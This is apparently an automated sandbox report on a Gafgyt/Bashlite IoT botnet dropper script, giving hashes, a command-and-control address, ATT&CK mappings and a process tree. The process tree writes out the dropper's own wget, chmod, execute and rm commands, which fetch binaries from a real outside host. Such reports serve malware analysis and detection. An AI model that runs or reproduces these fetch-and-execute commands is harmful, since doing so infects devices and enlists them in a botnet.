gafgyt | 3b2320de1e6753a8a4d12b51a344b8cb4302f5e6494685d9eb9b068223e17e07

Analysis

max time kernel
96s
max time network
147s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
20/02/2025, 20:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

felka.sh
Size

2KB
MD5

5922ebab69b093d45bcfaf633ae691be
SHA1

7be49c2aaf8e6db8b1f1f04791cc9c81f7c9821c
SHA256

3b2320de1e6753a8a4d12b51a344b8cb4302f5e6494685d9eb9b068223e17e07
SHA512

38b19bb1ee69b0081b19b47416dd8e7e593fc641d9c44d64417b8e2cf7056dbd5ad933fa5c009f42324475b33b8d1edb9e809a86382112547bd58ff22a27ec77

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

15.204.128.30:6140

Signatures

Detected Gafgyt variant 1 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1554	chmod
1563	chmod
1516	chmod
1559	chmod
1568	chmod
1532	chmod
1538	chmod
1578	chmod
1506	chmod
1573	chmod
1501	chmod
1511	chmod
1527	chmod
1544	chmod
1549	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/felkawtf.armv4l	1502	felka.sh

Reads system routing table 1 TTPs 2 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	felka.sh
File opened for reading	/proc/net/route	felkawtf.x86

Reads system network configuration 1 TTPs 2 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	felka.sh
File opened for reading	/proc/net/route	felkawtf.x86

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1555	felkawtf.mipsel
1557	rm
1548	wget
1550	felkawtf.mips
1552	rm
1553	wget

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/felkawtf.x86	wget
File opened for modification	/tmp/felkawtf.armv5l	wget
File opened for modification	/tmp/felkawtf.armv7l	wget
File opened for modification	/tmp/felkawtf.i586	wget
File opened for modification	/tmp/felkawtf.i686	wget
File opened for modification	/tmp/felkawtf.mips	wget
File opened for modification	/tmp/felkawtf.mipsel	wget
File opened for modification	/tmp/felkawtf.powerpc-440fp	wget
File opened for modification	/tmp/felkawtf.sh4	wget
File opened for modification	/tmp/felkawtf.armv4l	wget
File opened for modification	/tmp/felkawtf.armv6l	wget
File opened for modification	/tmp/felkawtf.m68k	wget
File opened for modification	/tmp/felkawtf.sparc	wget

/tmp/felka.sh
/tmp/felka.sh
1⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:1487
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.armv4l
  2⤵
  - Writes file to tmp directory
  PID:1491
- /bin/chmod
  chmod +x felkawtf.armv4l
  2⤵
  - File and Directory Permissions Modification
  PID:1501
- /tmp/felkawtf.armv4l
  ./felkawtf.armv4l
  2⤵
  PID:1502
- /bin/rm
  rm -rf felkawtf.armv4l
  2⤵
  PID:1504
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.armv5l
  2⤵
  - Writes file to tmp directory
  PID:1505
- /bin/chmod
  chmod +x felkawtf.armv5l
  2⤵
  - File and Directory Permissions Modification
  PID:1506
- /tmp/felkawtf.armv5l
  ./felkawtf.armv5l
  2⤵
  PID:1507
- /bin/rm
  rm -rf felkawtf.armv5l
  2⤵
  PID:1509
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.armv6l
  2⤵
  - Writes file to tmp directory
  PID:1510
- /bin/chmod
  chmod +x felkawtf.armv6l
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /tmp/felkawtf.armv6l
  ./felkawtf.armv6l
  2⤵
  PID:1512
- /bin/rm
  rm -rf felkawtf.armv6l
  2⤵
  PID:1514
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.armv7l
  2⤵
  - Writes file to tmp directory
  PID:1515
- /bin/chmod
  chmod +x felkawtf.armv7l
  2⤵
  - File and Directory Permissions Modification
  PID:1516
- /tmp/felkawtf.armv7l
  ./felkawtf.armv7l
  2⤵
  PID:1517
- /bin/rm
  rm -rf felkawtf.armv7l
  2⤵
  PID:1519
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.i486
  2⤵
  PID:1520
- /bin/chmod
  chmod +x felkawtf.i486
  2⤵
  - File and Directory Permissions Modification
  PID:1527
- /tmp/felkawtf.i486
  ./felkawtf.i486
  2⤵
  PID:1528
- /bin/rm
  rm -rf felkawtf.i486
  2⤵
  PID:1529
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.i586
  2⤵
  - Writes file to tmp directory
  PID:1530
- /bin/chmod
  chmod +x felkawtf.i586
  2⤵
  - File and Directory Permissions Modification
  PID:1532
- /bin/rm
  rm -rf felkawtf.i586
  2⤵
  PID:1536
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.i686
  2⤵
  - Writes file to tmp directory
  PID:1537
- /bin/chmod
  chmod +x felkawtf.i686
  2⤵
  - File and Directory Permissions Modification
  PID:1538
- /bin/rm
  rm -rf felkawtf.i686
  2⤵
  PID:1542
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.m68k
  2⤵
  - Writes file to tmp directory
  PID:1543
- /bin/chmod
  chmod +x felkawtf.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1544
- /tmp/felkawtf.m68k
  ./felkawtf.m68k
  2⤵
  PID:1545
- /bin/rm
  rm -rf felkawtf.m68k
  2⤵
  PID:1547
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1548
- /bin/chmod
  chmod +x felkawtf.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/felkawtf.mips
  ./felkawtf.mips
  2⤵
  - System Network Configuration Discovery
  PID:1550
- /bin/rm
  rm -rf felkawtf.mips
  2⤵
  - System Network Configuration Discovery
  PID:1552
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1553
- /bin/chmod
  chmod +x felkawtf.mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:1554
- /tmp/felkawtf.mipsel
  ./felkawtf.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1555
- /bin/rm
  rm -rf felkawtf.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1557
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.ppc
  2⤵
  PID:1558
- /bin/chmod
  chmod +x felkawtf.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1559
- /tmp/felkawtf.ppc
  ./felkawtf.ppc
  2⤵
  PID:1560
- /bin/rm
  rm -rf felkawtf.ppc
  2⤵
  PID:1561
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.powerpc-440fp
  2⤵
  - Writes file to tmp directory
  PID:1562
- /bin/chmod
  chmod +x felkawtf.powerpc-440fp
  2⤵
  - File and Directory Permissions Modification
  PID:1563
- /tmp/felkawtf.powerpc-440fp
  ./felkawtf.powerpc-440fp
  2⤵
  PID:1564
- /bin/rm
  rm -rf felkawtf.powerpc-440fp
  2⤵
  PID:1566
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.sh4
  2⤵
  - Writes file to tmp directory
  PID:1567
- /bin/chmod
  chmod +x felkawtf.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:1568
- /tmp/felkawtf.sh4
  ./felkawtf.sh4
  2⤵
  PID:1569
- /bin/rm
  rm -rf felkawtf.sh4
  2⤵
  PID:1571
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.sparc
  2⤵
  - Writes file to tmp directory
  PID:1572
- /bin/chmod
  chmod +x felkawtf.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:1573
- /tmp/felkawtf.sparc
  ./felkawtf.sparc
  2⤵
  PID:1574
- /bin/rm
  rm -rf felkawtf.sparc
  2⤵
  PID:1576
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.x86
  2⤵
  - Writes file to tmp directory
  PID:1577
- /bin/chmod
  chmod +x felkawtf.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1578
- /tmp/felkawtf.x86
  ./felkawtf.x86
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:1579
- /bin/rm
  rm -rf felkawtf.x86
  2⤵
  PID:1582

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/felkawtf.armv4l

Filesize
103KB

MD5
65e82ae08897c4aa2fabd0fbdf03e517

SHA1
103458b043607d921cfc6ee9bc9fd3151f73e9c2

SHA256
7691bc26f63eba56f496d5e610ab9cbbfd1b1b39f27b5571dd59a799c3334b72

SHA512
3405418e789d1362344bb636f60cd223e8460328949cec5f02935136002a4afeef66ac4dd959dd9f35310e2a0012f2077466ce5e8919de96d3f56d006db463fe

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads